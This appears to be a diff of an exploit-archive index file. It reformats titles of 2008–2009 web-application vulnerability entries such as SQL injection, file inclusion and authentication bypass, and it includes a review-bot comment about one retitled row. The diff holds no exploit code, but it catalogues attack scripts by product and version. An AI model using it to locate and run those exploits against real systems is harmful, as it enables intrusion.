 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0
 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0
-7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0
+7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,php,webapps,0
 7390,platforms/asp/webapps/7390.txt,"dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0
 7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Authentication Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0
-7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - (Remote File Inclusion / Local File Inclusion) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0
+7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion",2008-12-09,ZoRLu,php,webapps,0
 7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0
 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0
 7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Authentication Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0
-7398,platforms/asp/webapps/7398.txt,"postecards - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-09,AlpHaNiX,asp,webapps,0
+7398,platforms/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps,0
 7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - 
(common-tpl-vars.php) Local File Inclusion / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0
-7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-09,ahmadbady,php,webapps,0
+7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,php,webapps,0
 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0
 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0
 7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0
-7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (Cross-Site Scripting / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
-7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
+7408,platforms/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,php,webapps,0
+7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,php,webapps,0
 7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0
-7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
+7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps,0
 7413,platforms/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
 7414,platforms/asp/webapps/7414.txt,"CF_Auction - (forummessage) 
Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
 7415,platforms/asp/webapps/7415.txt,"CFMBLOG - 'index.cfm categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0
@@ -20215,21 +20218,21 @@ id,file,description,date,author,platform,type,port
 7433,platforms/php/webapps/7433.txt,"Social Groupie - 'group_index.php id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0
 7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0
-7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - (SQL Injection / File Disclosure) Multiple Vulnerabilities",2008-12-12,Pouya_Server,asp,webapps,0
+7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps,0
 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0
 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0
 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
 7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
-7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - (SQL Injection / Open Proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
+7441,platforms/php/webapps/7441.txt,"Joomla! 
Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
-7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (File Disclosure / Remote File Inclusion) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
+7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
 7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0
-7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - (Local File Inclusion / Cross-Site Request Forgery / Edit File) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0
+7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,php,webapps,0
 7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0
 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0
-7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0
+7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0
 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0
 7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0
 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0
@@ -20240,7 +20243,7 @@ id,file,description,date,author,platform,type,port
 7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0
 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0
 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0
-7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-14,XaDoS,php,webapps,0
+7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,php,webapps,0
 7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0
 7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
 7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
@@ -20258,7 +20261,7 @@ id,file,description,date,author,platform,type,port
 7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps,0
 7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title' SQL Injection",2008-12-15,ZoRLu,php,webapps,0
 7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
-7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0
+7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
 7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
 7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0
@@ -20266,7 +20269,7 @@ id,file,description,date,author,platform,type,port
 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0
 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0
 7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0
-7494,platforms/php/webapps/7494.txt,"Zelta E Store - (Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection) Multiple Vulnerabilities",2008-12-16,ZoRLu,php,webapps,0
+7494,platforms/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,php,webapps,0
 7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0
 7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps,0
 7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps,0
@@ -20296,12 +20299,12 @@ id,file,description,date,author,platform,type,port
 7529,platforms/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0
 7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0
 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0
-7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - (Database Backup/File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0
+7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0
 7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0
 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0
 7538,platforms/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0
 7539,platforms/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0
-7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (Cross-Site Scripting / Full Path Disclosure/Denial of Service) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0
+7540,platforms/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps,0
 7541,platforms/php/webapps/7541.pl,"RSS Simple News - 'news.php pid' SQL Injection",2008-12-22,Piker,php,webapps,0
 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0
 7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0
@@ -20323,7 +20326,7 @@ id,file,description,date,author,platform,type,port
 7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - (thread.php id) SQL Injection",2008-12-23,Samir-M,php,webapps,0
 7567,platforms/php/webapps/7567.txt,"Joomla! Component com_lowcosthotels - 'id' Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0
 7568,platforms/php/webapps/7568.txt,"Joomla! Component com_allhotels - 'id' Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0
-7569,platforms/php/webapps/7569.txt,"doop CMS 1.4.0b - (Cross-Site Request Forgery / Arbitrary File Upload) Multiple Vulnerabilities",2008-12-24,x0r,php,webapps,0
+7569,platforms/php/webapps/7569.txt,"doop CMS 1.4.0b - Cross-Site Request Forgery / Arbitrary File Upload",2008-12-24,x0r,php,webapps,0
 7570,platforms/php/webapps/7570.txt,"ILIAS 3.7.4 - (ref_id) Blind SQL Injection",2008-12-24,Lidloses_Auge,php,webapps,0
 7572,platforms/php/webapps/7572.txt,"Joomla! Component Ice Gallery 0.5b2 - 'catid' Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0
 7573,platforms/php/webapps/7573.txt,"Joomla! Component Live Ticker 1.0 - (tid) Blind SQL Injection",2008-12-24,boom3rang,php,webapps,0
@@ -20377,7 +20380,7 @@ id,file,description,date,author,platform,type,port
 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
-7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-02,ahmadbady,php,webapps,0
+7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
 7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Authentication Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0
 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
@@ -20396,7 +20399,7 @@ id,file,description,date,author,platform,type,port
 7674,platforms/php/webapps/7674.txt,"PHPAuctionSystem - Insecure Cookie Handling",2009-01-05,ZoRLu,php,webapps,0
 7678,platforms/php/webapps/7678.txt,"PHPAuctionSystem - Multiple Remote File Inclusion",2009-01-06,darkmasking,php,webapps,0
 7679,platforms/php/webapps/7679.php,"RiotPix 0.61 - (forumid) Blind SQL Injection",2009-01-06,cOndemned,php,webapps,0
-7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-06,!-BUGJACK-!,php,webapps,0
+7680,platforms/php/webapps/7680.txt,"ezpack 4.2b2 - Cross-Site Scripting / SQL Injection",2009-01-06,!-BUGJACK-!,php,webapps,0
 7682,platforms/php/webapps/7682.txt,"RiotPix 0.61 - (Authentication Bypass) SQL Injection",2009-01-06,ZoRLu,php,webapps,0
 7683,platforms/php/webapps/7683.pl,"Goople 1.8.2 - 'FrontPage.php' Blind SQL Injection",2009-01-06,darkjoker,php,webapps,0
 7686,platforms/php/webapps/7686.txt,"ItCMS 2.1a - Authentication Bypass",2009-01-06,certaindeath,php,webapps,0
@@ -20441,7 +20444,7 @@ id,file,description,date,author,platform,type,port
 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0
 7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0
 7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0
-7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0
+7761,platforms/asp/webapps/7761.txt,"Netvolution CMS 1.0 - Cross-Site Scripting / SQL Injection",2009-01-14,Ellinas,asp,webapps,0
 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0
 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0
 7767,platforms/asp/webapps/7767.txt,"DMXReady Classified Listings Manager 1.1 - SQL Injection",2009-01-14,ajann,asp,webapps,0
@@ -20474,8 +20477,8 @@ id,file,description,date,author,platform,type,port
 7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
 7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
 7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
-7805,platforms/php/webapps/7805.txt,"rankem - (File Disclosure / Cross-Site Scripting / cm) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0
-7806,platforms/php/webapps/7806.txt,"blogit! - (SQL Injection / File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-16,Pouya_Server,php,webapps,0
+7805,platforms/php/webapps/7805.txt,"rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0
+7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0
 7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0
 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
 7810,platforms/php/webapps/7810.txt,"Aj Classifieds Personals 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
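Review bot: The new title for 7805 ends in a bare `Cookie`, which names no vulnerability class and is a reinterpretation of the old `cm` token rather than a reformat. Every other row in this hunk only loses its parentheses and the `Multiple Vulnerabilities` suffix. Other entries in this file already use `Insecure Cookie Handling` (7497 and 7674, for example). If that is what `cm` stood for, which the page does not state and which should be confirmed against 7805.txt, the row would read `"rankem - File Disclosure / Cross-Site Scripting / Insecure Cookie Handling"`. A consistent class name keeps the entry findable for anyone filtering the index by issue type.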
@@ -20531,7 +20534,7 @@ id,file,description,date,author,platform,type,port
 7885,platforms/php/webapps/7885.txt,"Max.Blog 1.0.6 - (show_post.php) SQL Injection",2009-01-27,"Salvatore Fresta",php,webapps,0
 7886,platforms/php/webapps/7886.txt,"Pixie CMS 1.0 - Multiple Local File Inclusion",2009-01-27,DSecRG,php,webapps,0
 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0
-7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-01-28,Encrypt3d.M!nd,php,webapps,0
+7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion",2009-01-28,Encrypt3d.M!nd,php,webapps,0
 7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0
 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0
 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0
@@ -20548,13 +20551,13 @@ id,file,description,date,author,platform,type,port
 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
-7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0
+7925,platforms/php/webapps/7925.txt,"revou twitter clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
-7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0
+7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0
 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
-7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0
+7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection 
(PoC)",2009-02-02,"Alfons Luja",php,webapps,0
 7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
 7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
@@ -20565,7 +20568,7 @@ id,file,description,date,author,platform,type,port
 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,php,webapps,0
 7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps,0
 7949,platforms/php/webapps/7949.rb,"OpenHelpDesk 1.0.100 - eval() Code Execution (Metasploit)",2009-02-02,LSO,php,webapps,0
-18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0
+18164,platforms/android/webapps/18164.php,"Google Android - 'content://' URI Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0
 7951,platforms/php/webapps/7951.txt,"WholeHogSoftware Ware Support - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
 7952,platforms/php/webapps/7952.txt,"WholeHogSoftware Password Protect - Insecure Cookie Handling",2009-02-03,Stack,php,webapps,0
 7953,platforms/php/webapps/7953.txt,"ClickCart 6.0 - (Authentication Bypass) SQL Injection",2009-02-03,R3d-D3V!L,php,webapps,0
@@ -20587,13 +20590,13 @@ id,file,description,date,author,platform,type,port
 7978,platforms/php/webapps/7978.txt,"rgboard 4 5p1 (07.07.27) - Multiple Vulnerabilities",2009-02-04,make0day,php,webapps,0
 7979,platforms/php/webapps/7979.txt,"GRBoard 1.8 - Multiple Remote File Inclusion",2009-02-04,make0day,php,webapps,0
 7980,platforms/php/webapps/7980.pl,"PHPbbBook 1.3 - (bbcode.php l) Local File Inclusion",2009-02-04,Osirys,php,webapps,0
-7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0
-7982,platforms/asp/webapps/7982.txt,"team 1.x - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-04,Pouya_Server,asp,webapps,0
+7981,platforms/asp/webapps/7981.txt,"Power System Of Article Management 3.0 - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
+7982,platforms/asp/webapps/7982.txt,"team 1.x - File Disclosure / Cross-Site Scripting",2009-02-04,Pouya_Server,asp,webapps,0
 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0
-7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0
+7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - Arbitrary File Upload / Authentication Bypass",2009-02-04,JosS,php,webapps,0
 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0
 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0
-7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
+7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - Cross-Site Scripting / Local File Inclusion / File Disclosure",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0
 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0
 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0
 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote Arbitrary.PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0
@@ -20602,7 +20605,7 @@ id,file,description,date,author,platform,type,port
 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0
 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0
 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99)",2009-02-06,JosS,php,webapps,0
